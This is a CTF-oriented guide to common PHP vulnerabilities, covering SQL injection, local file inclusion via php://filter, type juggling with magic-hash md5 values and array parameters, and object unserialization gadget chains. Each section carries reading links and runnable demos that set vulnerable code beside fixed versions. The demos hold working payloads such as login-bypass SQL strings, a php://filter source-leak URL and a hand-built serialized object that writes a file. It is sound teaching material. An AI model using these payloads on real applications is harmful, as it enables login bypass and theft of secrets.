Pwning PHP CTF Challenges
This is a short "guide", or list of common PHP vulnerabilities you'll find in CTF challenges. Please note that this guide is not tailored towards real-world PHP applications!
The best way to get practice with a lot of these vulnerabilities is the websec.fr wargame!
1. SQL Injection
Tons of PHP applications are vulnerable to SQL injection, even in the real world! The biggest reason for this? Tons of old PHP "database tutorials" used code samples that built queries by string concatenation and were vulnerable to SQL injection. Also, PHP is an easy beginner's language, many devs are self-taught, and do not have any security knowledge.
Note that these challenges mostly test your knowledge of SQL, not of PHP.
Reading Links:
- Intro: https://ctf101.org/web-exploitation/sql-injection/what-is-sql-injection/
- Intro: https://en.wikipedia.org/wiki/SQL_injection#Incorrectly_filtered_escape_characters
- Hands-On Testing: https://github.com/ryotosaito/beginner-sqli
- Challenge Writeup: https://github.com/ctfs/write-ups-2014/tree/master/pico-ctf-2014/web-exploitation/injection-3-130
- Challenge Writeup: https://websec.wordpress.com/2010/03/19/exploiting-hard-filtered-sql-injections/
- Tips & Tricks: https://medium.com/bugbountywriteup/sql-injection-in-ctf-bef1ae0c5d9b
- Tips & Tricks: https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF
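A worked example of the two query styles the section contrasts, added here and not taken from the original post. It runs the tutorial-style concatenated login query next to its prepared-statement form against an in-memory SQLite database, so it is self-contained; it assumes the pdo_sqlite extension is enabled, and the users table and the payloads are constructed for the demo.

```php
<?php
// Added example, not from the original post: the string-concatenation login
// query from old tutorials next to its parameterised form, run against an
// in-memory SQLite database so it is self-contained. Assumes the pdo_sqlite
// extension is enabled; the users table and the payloads are constructed here.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)");
$db->exec("INSERT INTO users (username, password) VALUES ('admin', 's3cret'), ('bob', 'hunter2')");

// Vulnerable: user input becomes part of the SQL text, so quotes in the input
// change the structure of the query instead of being compared as data.
function loginVulnerable(PDO $db, string $user, string $pass): ?string
{
    $sql = "SELECT username FROM users WHERE username = '$user' AND password = '$pass'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row ? $row['username'] : null;
}

// Fixed: a prepared statement sends the query and the data separately, so the
// input can never be parsed as SQL, whatever characters it contains.
function loginSafe(PDO $db, string $user, string $pass): ?string
{
    $stmt = $db->prepare("SELECT username FROM users WHERE username = :u AND password = :p");
    $stmt->execute([':u' => $user, ':p' => $pass]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ? $row['username'] : null;
}

// Constructed payloads. The first makes the WHERE clause always true (AND binds
// tighter than OR, so the trailing "OR '1'='1'" satisfies the whole condition);
// the second closes the username string and comments out the password check
// ("-- " is a line comment in SQLite and MySQL).
$attempts = [
    ["' OR '1'='1", "' OR '1'='1"],
    ["admin'-- ",   "wrong"],
    ["admin",       "wrong"],
    ["admin",       "s3cret"],
];

foreach ($attempts as [$user, $pass]) {
    printf("%-32s vulnerable: %-12s safe: %s\n",
        json_encode($user),
        loginVulnerable($db, $user, $pass) ?? 'denied',
        loginSafe($db, $user, $pass) ?? 'denied');
}
```

The first two attempts log in as admin through the vulnerable query and are denied by the prepared statement; the last two behave the same in both, because with a correct password there is nothing to inject. Note that the injected comment needs the trailing space after `--` in both SQLite and MySQL.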
2. RFI/LFI
Remote file inclusion (RFI) and local file inclusion (LFI) vulnerabilities are abundant in PHP, and its stream wrapper API (`php://filter`, `php://input`, `data://`, `zip://`, `phar://` and friends) makes them far more powerful than a plain path traversal. Learn how to use it!
Any time code passes user-controlled input to `include`, `require_once`, `fopen`, `file_get_contents`, `file_put_contents` or a whole host of other filesystem functions, it is potentially vulnerable!
Reading Links:
- Intro: https://en.wikipedia.org/wiki/File_inclusion_vulnerability#Local_File_Inclusion
- Intro: https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/
- Tips & Tricks: https://github.com/qazbnm456/awesome-security-trivia/blob/master/Tricky-ways-to-exploit-PHP-Local-File-Inclusion.md
- Tips & Tricks: https://github.com/lucyoa/ctf-wiki/tree/master/web/file-inclusion
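The `php://filter` trick from the idontplaydarts link above, as an added example that is not part of the original post. It builds a page-include that is vulnerable to LFI, shows how appending `.php` blocks simple traversal but not a stream wrapper, leaks a config file's source as base64, and contrasts an allow-list version. The directory, files and parameter values are constructed for the demo; it assumes a writable system temp directory.

```php
<?php
// Added example, not from the original post: a page-include vulnerable to LFI,
// and how the php://filter stream wrapper turns it into source disclosure.
// The directory, files and parameter values are constructed here; assumes a
// writable system temp directory.

$dir = sys_get_temp_dir() . '/lfi_demo_' . getmypid();
mkdir($dir);
file_put_contents("$dir/home.php",   "<?php echo \"Welcome home\\n\";\n");
file_put_contents("$dir/config.php", "<?php\n\$db_password = 'supersecret'; // never meant to be shown\n");

// Vulnerable: the request parameter picks the file. The hard-coded ".php"
// suffix stops "../../etc/passwd" (unless null bytes work, i.e. PHP < 5.3.4),
// but a php://filter URL is still a valid include target and the suffix simply
// becomes part of the resource name.
function renderVulnerable(string $page): string
{
    ob_start();
    include $page . '.php';
    return ob_get_clean();
}

// Fixed: map the parameter onto a fixed allow-list instead of using it as a path.
function renderSafe(string $dir, string $page): string
{
    $pages = ['home' => "$dir/home.php"];
    if (!isset($pages[$page])) {
        return "404\n";
    }
    ob_start();
    include $pages[$page];
    return ob_get_clean();
}

// Normal use, equivalent to ?page=home
echo renderVulnerable("$dir/home");

// Attack, equivalent to ?page=php://filter/convert.base64-encode/resource=<dir>/config
// Including config.php directly would execute it and print nothing; routing it
// through the base64 filter makes the include emit the encoded source instead
// of running it, and a decode gives the original file.
$payload = "php://filter/convert.base64-encode/resource=$dir/config";
$leaked  = renderVulnerable($payload);
echo "leaked (base64): $leaked\n";
echo "decoded:\n" . base64_decode($leaked);

// The allow-listed version refuses the payload and still serves the real page.
echo renderSafe($dir, $payload);
echo renderSafe($dir, 'home');

// Remove the constructed files.
unlink("$dir/home.php");
unlink("$dir/config.php");
rmdir($dir);
```

The same wrapper works with `file_get_contents` and the other functions listed above; base64 is used because raw PHP source passed through `include` would be executed rather than displayed, and other filters (`string.rot13`, `convert.iconv.*`) serve when a filter blocks the word "base64".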
3. Type Errors/Type Juggling
PHP is dynamically and loosely typed: a request parameter can arrive as a string or as an array, and developers must check types with function calls such as `is_string` to ensure parameters are what they expect. Unfortunately, developers are often lazy or forget to perform these checks.
One common way to exploit this is passing an HTTP parameter as an array instead of a string. For example, the site may read the request parameter `$_GET['q']`. Normally this is a string, as it is in the URL `http://vulnerable.site/search.php?q=hello`. But you can pass in an array instead via a request such as `http://vulnerable.site/search.php?q[0]=hello&q[1]=world`. Functions that expect a string then misbehave: on PHP 5 and 7, built-ins such as `strcmp`, `md5` and `strlen` emit a warning and return `NULL` when handed an array, which a loose `== 0` check happily accepts; on PHP 8 they throw a `TypeError` instead, which can still abort a check or bypass a filter.
Type juggling is another (similar) vulnerability where comparisons are made with `==` instead of `===`, so automatic type conversion occurs: `"0e123" == "0e456"` is true because both sides are numeric strings equal to zero, and `"1e1" == "10"` is true as well. This can lead to exploitable bugs within the application, classically in password and hash checks.
Reading Links:
- Writeup: https://github.com/bl4de/ctf/blob/master/2015/BostonKeyPartyCTF_2015/Prudential.md
- Writeup: https://medium.com/@yashitmaheshwary/baby-php-web-challenge-writeup-hacklu-ctf-2018-3db6c72926cb
- Intro: https://blog.alertlogic.com/blog/writing-exploits-for-exotic-bug-classes-php-type-juggling/
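Both tricks from this section in working code, as an added example that is not part of the original post. The check functions, the query string and the secret are hypothetical; the two "magic hash" inputs are the well-known md5 preimages `QNKCDZO` and `240610708`, whose digests both start with `0e` followed only by digits.

```php
<?php
// Added example, not from the original post: loose comparisons behind typical
// CTF "login" checks, and the array-instead-of-string trick. The check
// functions, query string and secret are hypothetical; the two magic-hash
// inputs are well-known md5 preimages whose digests look like 0e<digits>.

// A hash check built on == (hypothetical). Both digests below have the form
// 0e<digits>, which PHP treats as numeric strings with the value 0, so the
// loose comparison is true even though the digests differ.
function checkHashLoose(string $input, string $storedHash): bool
{
    return md5($input) == $storedHash;
}

// Fixed: hash_equals() compares strings byte for byte, in constant time.
function checkHashStrict(string $input, string $storedHash): bool
{
    return hash_equals($storedHash, md5($input));
}

$storedHash = md5('QNKCDZO');   // 0e830400451993494058024219903391
foreach (['QNKCDZO', '240610708', 'wrong'] as $guess) {
    printf("%-10s loose: %-6s strict: %s\n", $guess,
        var_export(checkHashLoose($guess, $storedHash), true),
        var_export(checkHashStrict($guess, $storedHash), true));
}

// Other juggling results worth remembering. Two numeric strings compare as
// numbers on every PHP version, so exponent notation and leading zeros
// collapse; comparing the integer 0 with a non-numeric string was true up to
// PHP 7 and became false in PHP 8, so the last line depends on the version.
var_dump('1e1' == '10', '01' == '1', '0e123' == '0e456', 0 == 'abc');

// The array trick: PHP's query-string parser turns q[0]=...&q[1]=... into an
// array, exactly as it would for $_GET.
parse_str('token[0]=hello&token[1]=world', $query);
var_dump(is_array($query['token']));

// Hypothetical token check. On PHP 5/7, strcmp() given an array emits a warning
// (silenced here with @) and returns NULL, and NULL == 0 is true, so the check
// passes with a token the attacker never knew. PHP 8 throws a TypeError instead.
function verifyTokenLoose($token, string $secret): bool
{
    return @strcmp($token, $secret) == 0;
}

// Fixed: insist on a string before comparing, then compare strictly.
function verifyTokenStrict($token, string $secret): bool
{
    return is_string($token) && hash_equals($secret, $token);
}

$secret = 'correct-horse-battery-staple';
try {
    var_dump(verifyTokenLoose($query['token'], $secret));
} catch (TypeError $e) {
    echo "PHP 8 refuses the array: ", $e->getMessage(), "\n";
}
var_dump(verifyTokenStrict($query['token'], $secret));
```

On PHP 7 the loose token check returns true for the array; on PHP 8 the `TypeError` branch runs instead, which in a real application means the comparison never happens and the outcome depends on how the surrounding code handles the exception. The strict version is false on both.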
4. Object Unserialization Injection
As usual, unserializing attacker-controlled data isn't safe. You can inject arbitrary objects of any class the application has loaded to trigger logic bugs, or to make PHP call magic methods such as `__wakeup`, `__destruct` and `__toString` with attacker-chosen property values (the building blocks of a "gadget chain").
Reading Links:
- Intro: https://www.owasp.org/index.php/PHP_Object_Injection
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Insecure deserialization/PHP.md
- Writeup: https://hack.more.systems/writeup/2016/10/02/tumctf-web50/
- Writeup: https://blog.0daylabs.com/2016/04/03/unserialize-php-object-injection/
- Advanced Serialization Info: http://www.phpinternalsbook.com/classes_objects/serialization.html
- List of Types: https://www.evonide.com/fuzzing-unserialize/
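A minimal object-injection chain in working code, as an added example that is not part of the original post: a class whose `__destruct()` writes a file, a serialized payload built by hand so the format is visible, and the `allowed_classes` guard that neutralises it. The class, payload and output path are constructed for the demo; it assumes PHP 7.0 or later and a writable system temp directory.

```php
<?php
// Added example, not from the original post: a class whose __destruct() does
// something useful for an attacker, a hand-built serialized payload that
// abuses it, and the allowed_classes guard. The class, payload and file path
// are constructed for the demo; assumes PHP 7.0+ and a writable temp directory.

class LogWriter
{
    public $path;
    public $content;

    public function __construct(string $path, string $content)
    {
        $this->path = $path;
        $this->content = $content;
    }

    // Runs when the object is freed, including objects created by unserialize().
    public function __destruct()
    {
        file_put_contents($this->path, $this->content);
    }
}

// Build the payload by hand in PHP's serialization format so its structure is
// visible: O:<len>:"<class>":<count>:{s:<len>:"<prop>";s:<len>:"<value>";...}
// Every string carries its byte length, which is why hand-crafted payloads
// must be recomputed whenever a value changes.
function craftPayload(string $path, string $content): string
{
    return sprintf('O:9:"LogWriter":2:{s:4:"path";s:%d:"%s";s:7:"content";s:%d:"%s";}',
        strlen($path), $path, strlen($content), $content);
}

$target  = sys_get_temp_dir() . '/unserialize_demo_' . getmypid() . '.txt';
$payload = craftPayload($target, "written by a gadget\n");
echo "payload: $payload\n";

// Vulnerable: unserialize() instantiates whatever class the data names, without
// calling its constructor. The object is discarded when the function returns,
// so __destruct() fires with attacker-chosen properties and writes the file.
function loadVulnerable(string $data): void
{
    $obj = unserialize($data);
    echo "vulnerable: got ", get_class($obj), "\n";
}

// Hardened: allowed_classes => false (PHP 7.0+) turns every object into a
// __PHP_Incomplete_Class, whose magic methods never run. Passing an explicit
// list of harmless classes works the same way for data that must carry objects.
function loadSafe(string $data): void
{
    $obj = unserialize($data, ['allowed_classes' => false]);
    echo "safe: got ", get_class($obj), "\n";
}

loadVulnerable($payload);
echo "file exists after vulnerable load: ", var_export(file_exists($target), true), "\n";
if (file_exists($target)) {
    unlink($target);
}

loadSafe($payload);
echo "file exists after safe load: ", var_export(file_exists($target), true), "\n";
```

Two caveats a practitioner will want: the hardened form only helps while the incomplete object stays incomplete, so never re-serialize it and unserialize it again somewhere that has no restriction; and where the data does not need objects at all, `json_decode` sidesteps the whole class of bug.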
5. Other Misc. Stuff
I'll be adding to this list as I see new things...
- Sandbox escaping: http://blog.dornea.nu/2016/06/20/ringzer0-ctf-jail-escaping-php/
- Null byte injection: http://php.net/manual/en/security.filesystem.nullbytes.php
- XXE attack (XML injection): https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE injection
- `preg_replace` /e flag (evaluates the replacement string as PHP code; deprecated in PHP 5.5 and removed in PHP 7.0, so it only shows up on older targets): https://bitquark.co.uk/blog/2013/07/23/the_unexpected_dangers_of_preg_replace